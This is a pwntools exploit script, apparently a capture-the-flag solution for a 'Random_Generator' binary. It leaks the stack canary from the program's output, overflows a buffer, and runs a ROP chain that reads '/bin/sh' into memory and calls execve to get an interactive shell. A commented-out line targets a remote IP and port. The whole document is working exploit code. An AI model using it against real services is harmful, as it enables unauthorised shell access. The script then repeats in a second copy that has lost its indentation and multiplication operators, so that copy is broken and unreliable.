kokjo/doit.py

## doit.py
from pwn import *
context.arch = "amd64"

r = process("./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1")
#r = remote("69.90.132.40", 4000)

values = [0]

for i in range(1,8):
    r.sendline(str(i))
    r.recvuntil("Your value = ")
    values.append(int(r.recvline()))

cookie = u64(flat(values, word_size=8))
log.info("Stack cookie = 0x%016x", cookie)

pop_rax_rdi = 0x0000000000400f8c
pop_rsi_r15 = 0x0000000000400f61
mov_rdx_rsi = 0x0000000000400f88
syscall = 0x0000000000400f8f
bss = 0x602244

def syscall3(no, arg1, arg2, arg3):
    return [pop_rax_rdi, no, arg1,
            pop_rsi_r15, arg3, 0x4141414141414141, mov_rdx_rsi,
            pop_rsi_r15, arg2, 0x4141414141414141,
            syscall]

r.sendline("0")

rop = flat([
    syscall3(0, 0, bss, 8),
    syscall3(0x3b, bss, 0,00)
])

assert "\n" not in rop

#gdb.attach(r)

r.sendline("A"*1032 + p64(cookie) + "B"*8 + rop)
sleep(0.1)
r.send("/bin/sh\x00")

r.sendline("echo SHELL")
r.recvuntil("SHELL\n")

r.interactive()
	from pwn import *
	context.arch = "amd64"

	r = process("./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1")
	#r = remote("69.90.132.40", 4000)

	values = [0]

	for i in range(1,8):
	r.sendline(str(i))
	r.recvuntil("Your value = ")
	values.append(int(r.recvline()))

	cookie = u64(flat(values, word_size=8))
	log.info("Stack cookie = 0x%016x", cookie)

	pop_rax_rdi = 0x0000000000400f8c
	pop_rsi_r15 = 0x0000000000400f61
	mov_rdx_rsi = 0x0000000000400f88
	syscall = 0x0000000000400f8f
	bss = 0x602244

	def syscall3(no, arg1, arg2, arg3):
	return [pop_rax_rdi, no, arg1,
	pop_rsi_r15, arg3, 0x4141414141414141, mov_rdx_rsi,
	pop_rsi_r15, arg2, 0x4141414141414141,
	syscall]

	r.sendline("0")

	rop = flat([
	syscall3(0, 0, bss, 8),
	syscall3(0x3b, bss, 0,00)
	])

	assert "\n" not in rop

	#gdb.attach(r)

	r.sendline("A"1032 + p64(cookie) + "B"8 + rop)
	sleep(0.1)
	r.send("/bin/sh\x00")

	r.sendline("echo SHELL")
	r.recvuntil("SHELL\n")

	r.interactive()